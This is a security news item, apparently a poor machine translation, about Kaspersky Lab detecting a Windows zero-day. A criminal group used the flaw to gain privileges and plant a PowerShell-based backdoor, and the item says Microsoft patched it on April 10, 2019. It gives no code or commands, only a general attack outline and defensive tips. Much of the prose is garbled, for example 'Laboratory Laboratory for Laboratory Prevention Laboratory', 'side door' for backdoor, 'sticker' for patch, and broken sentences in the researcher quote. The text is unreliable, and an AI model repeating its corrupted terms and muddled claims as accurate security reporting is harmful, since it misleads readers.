The Lab's automated technology revealed the previously unknown vulnerability of Microsoft Windows. This vulnerability was exploited by an unknown criminal group trying to gain full control over the target device. The attack was aimed at the core of the operating system through the side door. These are derived from the basic element of Windows.
Malware that installs side doors is very dangerous because it allows attackers to control the infected devices impeccably. It's hard to hide this increase in third party special security solutions. But the above malware has exploitation of a previously unknown system hole, it is the zero-day vulnerability, there are significantly more opportunities for it to function unnoticed. Common security solutions can not recognize the infection of the system and therefore can not protect the user from the threat that needs to be recognized.
The Laboratory Laboratory for Laboratory Prevention Laboratory Laboratory technology, in order to prevent software exploitation of holes in the computer system, could still reveal an attempt to exploit the unknown vulnerability of Microsoft Windows. The attack scenario was as follows: after the execution of a malicious executable file (.exe), the installation of malware began. Malicious software used the infection to exploit the vulnerability to zero-day and managed to obtain special rights to survive the victim's device. It then caused the creation of a side door by using a legitimate Windows element. It is a shell called shell, called Windows PowerShell, which is present on all devices with this operating system. This allowed attackers to avoid detection, saving him time to write malicious code. Malware then downloaded another side door through a popular legitimate text storage service, giving criminals complete control over the infected system.
"In this attack, we could see two major trends, which are often present in advanced persistent threats. The first trend is the use of holes in the computer system to gain more power and, thus, the successful existence of the device of the victim. is using a legitimate framework such as Windows PowerShell for malicious activity on the victim's device.The combination of both approaches allows attackers to bypass conventional security solutions.In order to discover such techniques, enija must use technology to prevent software exploiting vulnerabilities in the computer system and the detection of patterns of behavior " explanation Anton Ivanov, a security researcher at Kaspersky Lab.
Vulnerability was reported to Microsoft and abolished on April 10, 2019.
Kaspersky Lab advises users to take the following precautions to prevent the installation of malware that creates a side door through the Windows zero-day vulnerability:
- When the vulnerability is fixed and the sticker is loaded, potential attackers can no longer use it. Therefore, install Microsoft corrections of identified vulnerabilities as soon as possible.
- If you are concerned about the security of your organization, make sure the software is upgraded as soon as new security updates are available. To ensure automatic deployment of the process, use security products that include vulnerability assessment and ability to manage patches.
- Use a proven security solution that has the ability to protect against unknown threats based on perceived behavior, such as Kaspersky Endpoint Security.
- Make sure your security team has access to the latest expertise in cyber security threats. Private reports on the latest threat development are available for Kasperesky Intelligence Reporting customers.
- Make sure that your staff has the basic skills to provide security online.